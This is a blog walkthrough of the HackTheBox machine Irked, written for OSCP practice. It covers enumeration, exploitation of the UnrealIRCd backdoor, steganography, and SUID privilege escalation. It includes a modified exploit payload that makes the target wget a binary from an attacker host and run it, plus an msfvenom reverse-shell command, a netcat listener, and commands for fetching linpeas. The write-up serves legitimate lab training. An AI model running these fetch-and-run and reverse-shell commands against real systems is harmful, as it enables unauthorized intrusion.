Road to OSCP 10: Irked HackTheBox

Follow along my OSCP journey! This is my 10th target from the TJNULL’s OSCP list.

How to use this walkthrough?

To avoid the typical answer on a plate type of walkthrough, I have decided to follow the TryHackMe idea of giving you some hints along the way to help you when you struggle and keep the Try Harder mantra real.

Let’s go!

Enumeration

I use Tib3rius’ multi-threaded Autorecon which combines a couple of different tools to enumerate and scan services. It creates a simple file structure and provides you with a nice overview of the services scanned.

python3 /opt/AutoRecon/autorecon.py -cs 25 -vv -o /home/kali/Documents/HTB/lab/ 10.10.10.117

Autorecon

While it runs, I usually look at the _quick_tcp_nmap.txt file while we wait for the _full_tcp_nmap.txt

PORT    STATE SERVICE REASON         VERSION
22/tcp  open  ssh     syn-ack ttl 63 OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAI+wKAAyWgx/P7Pe78y6/80XVTd6QEv6t5ZIpdzKvS8qbkChLB7LC+/HVuxLshOUtac4oHr/IF9YBytBoaAte87fxF45o3HS9MflMA4511KTeNwc5QuhdHzqXX9ne0ypBAgFKECBUJqJ23Lp2S9KuYEYLzUhSdUEYqiZlcc65NspAAAAFQDwgf5Wh8QRu3zSvOIXTk+5g0eTKQAAAIBQuTzKnX3nNfflt++gnjAJ/dIRXW/KMPTNOSo730gLxMWVeId3geXDkiNCD/zo5XgMIQAWDXS+0t0hlsH1BfrDzeEbGSgYNpXoz42RSHKtx7pYLG/hbUr4836olHrxLkjXCFuYFo9fCDs2/QsAeuhCPgEDjLXItW9ibfFqLxyP2QAAAIAE5MCdrGmT8huPIxPI+bQWeQyKQI/lH32FDZb4xJBPrrqlk9wKWOa1fU2JZM0nrOkdnCPIjLeq9+Db5WyZU2u3rdU8aWLZy8zF9mXZxuW/T3yXAV5whYa4QwqaVaiEzjcgRouex0ev/u+y5vlIf4/SfAsiFQPzYKomDiBtByS9XA==
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDDGASnp9kH4PwWZHx/V3aJjxLzjpiqc2FOyppTFp7/JFKcB9otDhh5kWgSrVDVijdsK95KcsEKC/R+HJ9/P0KPdf4hDvjJXB1H3Th5/83gy/TEJTDJG16zXtyR9lPdBYg4n5hhfFWO1PxM9m41XlEuNgiSYOr+uuEeLxzJb6ccq0VMnSvBd88FGnwpEoH1JYZyyTnnbwtBrXSz1tR5ZocJXU4DmI9pzTNkGFT+Q/K6V/sdF73KmMecatgcprIENgmVSaiKh9mb+4vEfWLIe0yZ97c2EdzF5255BalP3xHFAY0jROiBnUDSDlxyWMIcSymZPuE1N6Tu8nQ/pXxKvUar
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFeZigS1PimiXXJSqDy2KTT4UEEphoLAk8/ftEXUq0ihDOFDrpgT0Y4vYgYPXboLlPBKBc0nVBmKD+6pvSwIEy8=
|   256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC6m+0iYo68rwVQDYDejkVvsvg22D8MN+bNWMUEOWrhj
80/tcp  open  http    syn-ack ttl 63 Apache httpd 2.4.10 ((Debian))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp open  rpcbind syn-ack ttl 63 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          41338/tcp6  status
|   100024  1          56847/tcp   status
|   100024  1          59927/udp   status
|_  100024  1          60062/udp6  status
6697/tcp  open  irc     syn-ack ttl 63 UnrealIRCd
8067/tcp  open  irc     syn-ack ttl 63 UnrealIRCd
56847/tcp open  status  syn-ack ttl 63 1 (RPC #100024)
65534/tcp open  irc     syn-ack ttl 63 UnrealIRCd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Let’s look at what is running on the webserver:

80 — Web

We tried to dirbust it, look for anything interesting but it’s just a simple picture. Nothing much we can do there.

UnrealIRC

We then look at the IRC app opened on the higher ports and see if there is anything interesting there.

Let’s download the Perl script and let’s look at it

13853.pl

It seems we can provide the information for the host that we are attacking as an argument. Don’t forget to give it executable permissions.

This usage output is quite interesting when you think of what it corresponds to in the script.

HINT

Why do you think nothing happened when I try to execute it …

.

.

.

.

If you read the code that corresponds to the payloads, you’ll realise that there is a bit of an issue as the server will not be able to produce anything reaching the outside network.

So to modify this, let’s host the reverse shell ourselves. First, we need to create it:

msfvenom -p linux/x86/shell/reverse_tcp LHOST=10.10.16.2 LPORT=4444 -f elf > bot.elf

Now we can host it using an awesome HTTP server updog and update the payload code.

updog -p 8000

And now we change the payload

my $payload2 = 'AB; cd /tmp; wget http://efnetbs.webs.com/bot.txt -O bot; chmod +x bot; ./bot &';

Changed to the following

my $payload2 = 'AB; cd /tmp; wget http://10.10.16.2:8000/bot.elf -O bot; chmod +x bot; ./bot &';

Don’t forget to start your listener!

nc -nlvp 4444

Let us see if it works a bit better this time …. and no luck. It seems the socket or the exploit isn’t working, as we didn’t find anything on the web server this seems like it should be our only way in.

Let us see if we can find different exploits for the same vulnerability online and compare.
We found one

It looks quite similar other than some upgrades that have been added to the payloads and the execution, the part that interests me is the small “.encode()” that we see at the end.

Based on the documentation found online it encodes in UTF-8 if nothing else is specified and avoids most encoding issues when sending the data over the socket.

Let’s try this exploit and see if we are a bit luckier?

Don’t forget to provide the information required for the reverse shell to reach us.

python3 exploit.py 10.10.10.117 6697 -payload python

Our listener seems to have received something

Privilege escalation

Time for some shell upgrade 😉

1. python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
2. Ctrl+Z
3. stty raw -echo
4. fg (nothing will show on the screen, just type enter after the command a couple of times)

Enumeration

we start by getting some information on our user and if there is anything interesting in their home directory

Going through the history doesn’t gives us much but we do see that there is a backup in the following path /home/dmardov/Documents/

/home/dmardov/Documents/

We can see the user flag, but we don’t have access yet.

Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

That’s really cool, we have a password to try out things. We tried to use it to connect as the user but that didn’t work…

HINT

Super elite steg backup pw

What could this be referring to?

.

.

.

.

Hopefully you got it, steganography. And the main idea that comes to mind when thinking of where there could have been stegano used is the web picture. Let’s see if there is something hidden inside?

there might be something in this image

wget http://10.10.10.117/irked.jpg
steghide --info irked.jpg

Bingo! Using the password as passphrase we find the following.

Let’s extract it

steghide extract -sf irked.jpg

Kab6h+m+bbp2J:HG

Again let’s see if we can connect as the user!

Let’s go! Get the user flag and we can move to the last step of our challenge.

Let’s SSH as djmardov, now that we have the credentials to have a stable shell.

Getting Root

The way I go about getting root is the following: I’ll look for some quick wins and then run some enumeration scripts to help me find some weaknesses.

Quick Wins

sudo -l → sudo permissions
ls -la /opt/ → looking for interesting executables or files
ls -la /var/www/; ls -la /var/www/html → possible configuration files with db pasword or even user password.
ls -la /etc/passwd; ls -la /etc/shadow → misconfigured permissions (write on passwd and read on shadow)

Nothing of interest unfortunately and oddly sudo isn’t installed.

Enumeration scripts

This is where we upload our linpeas, LinEnum and Exploit Suggester.

On our attacking machine
We start by setting our Simple Python HTTP Server Updog in the folder where you have all your privilege escalation scripts.

updog -p 8000

On the victim’s machine
We look for a writable folder, wget the scripts we want, give them the right permissions and finally execute them.

cd /tmp/
wget http://attacking_ip:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

There are a lot of interesting items in the linpeas output.

HINT

Linpeas specifically mentions one thing that is unknown

.

.

.

.

Linpeas SUID

Let’s look at what that executable does

Ok,fd so it looks like a custom executable to view and test user’s permissions. We can try to find out more by running strings against it.

Its seems that the executable runs some system commands. We could imagine that something calls that list of user with the system function above. If that’s the case, lets’ just set /tmp/listusers with bash inside.

Let’s go! Let’s get the root flag.

What did I learn?

1. Basics of Stegano with steghide.
2. How to analyse an exploit, modify it and using it to exploit a vulnerability.
3. How to analyse an executable with SUID bit to escalate privileges.

Stream

I hope you guys enjoyed the walkthrough. Don’t hesitate to join me and struggle together on those machines on my twitch stream Wednesdays and Sundays.